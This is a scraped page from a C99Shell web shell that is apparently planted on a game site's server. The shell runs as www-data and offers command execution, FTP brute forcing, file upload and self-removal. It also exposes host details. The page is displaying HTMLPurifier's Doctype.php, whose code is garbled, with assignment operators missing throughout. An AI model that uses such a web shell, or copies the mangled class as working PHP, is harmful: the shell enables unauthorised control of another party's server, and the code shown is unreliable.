!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/gamesdaddy/cloudarcade/vendor/HTMLPurifier/HTMLPurifier/   drwxr-xr-x
Free 13.23 GB of 57.97 GB (22.82%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Doctype.php (1.62 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/**
 * Represents a document type, contains information on which modules
 * need to be loaded.
 * @note This class is inspected by Printer_HTMLDefinition->renderDoctype.
 *       If structure changes, please update that function.
 */
class HTMLPurifier_Doctype
{
    
/**
     * Full name of doctype
     * @type string
     */
    
public $name;

    
/**
     * List of standard modules (string identifiers or literal objects)
     * that this doctype uses
     * @type array
     */
    
public $modules = array();

    
/**
     * List of modules to use for tidying up code
     * @type array
     */
    
public $tidyModules = array();

    
/**
     * Is the language derived from XML (i.e. XHTML)?
     * @type bool
     */
    
public $xml true;

    
/**
     * List of aliases for this doctype
     * @type array
     */
    
public $aliases = array();

    
/**
     * Public DTD identifier
     * @type string
     */
    
public $dtdPublic;

    
/**
     * System DTD identifier
     * @type string
     */
    
public $dtdSystem;

    public function 
__construct(
        
$name null,
        
$xml true,
        
$modules = array(),
        
$tidyModules = array(),
        
$aliases = array(),
        
$dtd_public null,
        
$dtd_system null
    
) {
        
$this->name         $name;
        
$this->xml          $xml;
        
$this->modules      $modules;
        
$this->tidyModules  $tidyModules;
        
$this->aliases      $aliases;
        
$this->dtdPublic    $dtd_public;
        
$this->dtdSystem    $dtd_system;
    }
}

// vim: et sw=4 sts=4

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0056 ]--